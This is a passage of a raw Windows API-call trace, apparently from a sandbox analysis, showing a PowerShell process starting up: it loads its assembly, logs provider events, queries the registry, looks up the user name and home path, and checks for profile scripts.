	[0763.592] CoTaskMemFree (pv=0x1b965a70) 
	[0763.592] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0763.592] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0763.592] CoTaskMemFree (pv=0x239c20) 
	[0763.593] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa31b0*="FileSystem", lpRawData=0x2fa2f40) returned 1
	[0764.717] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0764.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.717] CoTaskMemFree (pv=0x1b93b9c0) 
	[0764.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.719] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0764.719] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0764.720] CoTaskMemFree (pv=0x1b965a70) 
	[0764.720] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0764.720] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0764.720] CoTaskMemFree (pv=0x239c20) 
	[0764.721] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa89f0*="Function", lpRawData=0x2fa8780) returned 1
	[0764.725] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0764.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.725] CoTaskMemFree (pv=0x1b93b9c0) 
	[0764.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0766.812] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0766.812] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0766.813] CoTaskMemFree (pv=0x1b965a70) 
	[0766.813] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0766.813] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0766.813] CoTaskMemFree (pv=0x239c20) 
	[0766.813] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fcb218*="Registry", lpRawData=0x2fcafa8) returned 1
	[0767.136] CoTaskMemAlloc (cb=0x804) returned 0x1b965a70
	[0767.136] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b965a70, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0767.137] CoTaskMemFree (pv=0x1b965a70) 
	[0767.137] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0767.137] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0767.137] CoTaskMemFree (pv=0x239c20) 
	[0767.138] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd0630*="Variable", lpRawData=0x2fd03c0) returned 1
	[0767.141] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0767.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.141] CoTaskMemFree (pv=0x1b93b9c0) 
	[0767.142] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0767.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.142] CoTaskMemFree (pv=0x1b93b9c0) 
	[0784.915] CoTaskMemAlloc (cb=0x804) returned 0x1b970ce0
	[0784.915] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b970ce0, nSize=0x18d608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d608) returned 0x1
	[0784.928] CoTaskMemFree (pv=0x1b970ce0) 
	[0784.928] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0784.928] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d648) returned 1
	[0784.928] CoTaskMemFree (pv=0x239c20) 
	[0784.929] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df3538*="Certificate", lpRawData=0x2df32c8) returned 1
	[0784.987] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0784.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0784.987] CoTaskMemFree (pv=0x1b93b9c0) 
	[0784.991] GetLogicalDrives () returned 0x4
	[0784.991] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18d290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0784.991] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0784.992] CoTaskMemAlloc (cb=0x20e) returned 0x2955d0
	[0784.992] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2955d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0784.992] CoTaskMemFree (pv=0x2955d0) 
	[0784.994] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0784.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0784.994] CoTaskMemFree (pv=0x1b93b9c0) 
	[0784.994] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0784.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0784.994] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.013] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.013] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.014] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.014] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0785.015] SetErrorMode (uMode=0x1) returned 0x1
	[0785.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d250 | out: lpFileInformation=0x18d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0785.015] SetErrorMode (uMode=0x1) returned 0x1
	[0785.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0785.015] SetErrorMode (uMode=0x1) returned 0x1
	[0785.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d250 | out: lpFileInformation=0x18d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0785.015] SetErrorMode (uMode=0x1) returned 0x1
	[0785.016] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.016] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0785.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0785.019] SetErrorMode (uMode=0x1) returned 0x1
	[0785.020] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x18d510 | out: lpFileInformation=0x18d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0785.020] SetErrorMode (uMode=0x1) returned 0x1
	[0785.864] CoTaskMemAlloc (cb=0x804) returned 0x1b970ce0
	[0785.864] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b970ce0, nSize=0x18d878 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18d878) returned 0x1
	[0785.864] CoTaskMemFree (pv=0x1b970ce0) 
	[0785.864] CoTaskMemAlloc (cb=0x204) returned 0x239c20
	[0785.864] GetUserNameW (in: lpBuffer=0x239c20, pcbBuffer=0x18d8b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d8b8) returned 1
	[0785.865] CoTaskMemFree (pv=0x239c20) 
	[0785.865] ReportEventW (hEventLog=0x1ba30008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e3bdd0*="Available", lpRawData=0x2e3bb60) returned 1
	[0785.933] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.933] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.934] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.934] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.936] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.936] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0785.936] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.936] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.936] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0785.936] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.939] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d898 | out: phkResult=0x18d898*=0x39c) returned 0x0
	[0785.939] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d81c, lpData=0x0, lpcbData=0x18d818*=0x0 | out: lpType=0x18d81c*=0x1, lpData=0x0, lpcbData=0x18d818*=0x56) returned 0x0
	[0785.939] CoTaskMemAlloc (cb=0x5a) returned 0x1b942090
	[0785.939] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d7ec, lpData=0x1b942090, lpcbData=0x18d7e8*=0x56 | out: lpType=0x18d7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d7e8*=0x56) returned 0x0
	[0785.939] CoTaskMemFree (pv=0x1b942090) 
	[0785.940] RegCloseKey (hKey=0x39c) returned 0x0
	[0785.941] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.941] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.968] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.968] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.973] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.974] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.974] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.974] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.975] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.975] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.976] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.976] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.977] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.978] CoTaskMemFree (pv=0x1b93b9c0) 
	[0785.978] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0785.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.978] CoTaskMemFree (pv=0x1b93b9c0) 
	[0786.073] CoTaskMemAlloc (cb=0x104) returned 0x1b93b9c0
	[0786.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93b9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.073] CoTaskMemFree (pv=0x1b93b9c0) 
	[0787.901] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b93bad0
	[0787.903] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b93bbe0
	[0792.677] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0792.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.677] CoTaskMemFree (pv=0x1b93bcf0) 
	[0792.682] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0792.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.683] CoTaskMemFree (pv=0x1b93bcf0) 
	[0792.699] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d9f8 | out: phkResult=0x18d9f8*=0x3a0) returned 0x0
	[0792.699] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d97c, lpData=0x0, lpcbData=0x18d978*=0x0 | out: lpType=0x18d97c*=0x1, lpData=0x0, lpcbData=0x18d978*=0x56) returned 0x0
	[0792.699] CoTaskMemAlloc (cb=0x5a) returned 0x2b29d0
	[0792.699] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d94c, lpData=0x2b29d0, lpcbData=0x18d948*=0x56 | out: lpType=0x18d94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d948*=0x56) returned 0x0
	[0792.699] CoTaskMemFree (pv=0x2b29d0) 
	[0792.700] RegCloseKey (hKey=0x3a0) returned 0x0
	[0792.700] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d9f8 | out: phkResult=0x18d9f8*=0x3a0) returned 0x0
	[0792.700] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d97c, lpData=0x0, lpcbData=0x18d978*=0x0 | out: lpType=0x18d97c*=0x1, lpData=0x0, lpcbData=0x18d978*=0x56) returned 0x0
	[0792.700] CoTaskMemAlloc (cb=0x5a) returned 0x2b29d0
	[0792.700] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d94c, lpData=0x2b29d0, lpcbData=0x18d948*=0x56 | out: lpType=0x18d94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d948*=0x56) returned 0x0
	[0792.700] CoTaskMemFree (pv=0x2b29d0) 
	[0792.700] RegCloseKey (hKey=0x3a0) returned 0x0
	[0793.718] CoTaskMemAlloc (cb=0x20c) returned 0x1b932970
	[0793.719] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b932970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0793.720] CoTaskMemFree (pv=0x1b932970) 
	[0793.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0793.720] CoTaskMemAlloc (cb=0x20c) returned 0x1b932970
	[0793.720] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b932970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0793.720] CoTaskMemFree (pv=0x1b932970) 
	[0793.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0793.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x18d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0793.723] SetErrorMode (uMode=0x1) returned 0x1
	[0793.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18d960 | out: lpFileInformation=0x18d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0793.723] SetErrorMode (uMode=0x1) returned 0x1
	[0793.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x18d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0793.723] SetErrorMode (uMode=0x1) returned 0x1
	[0793.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18d960 | out: lpFileInformation=0x18d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0793.723] SetErrorMode (uMode=0x1) returned 0x1
	[0793.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x18d750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0793.724] SetErrorMode (uMode=0x1) returned 0x1
	[0793.724] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18d960 | out: lpFileInformation=0x18d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0793.724] SetErrorMode (uMode=0x1) returned 0x1
	[0793.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x18d750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0793.724] SetErrorMode (uMode=0x1) returned 0x1
	[0793.724] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x18d960 | out: lpFileInformation=0x18d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0793.724] SetErrorMode (uMode=0x1) returned 0x1
	[0793.727] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.727] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.728] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.728] CoTaskMemFree (pv=0x1b93bcf0) 
	[0793.731] CoTaskMemAlloc (cb=0x104) returned 0x1b93bcf0
	[0793.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b93bcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
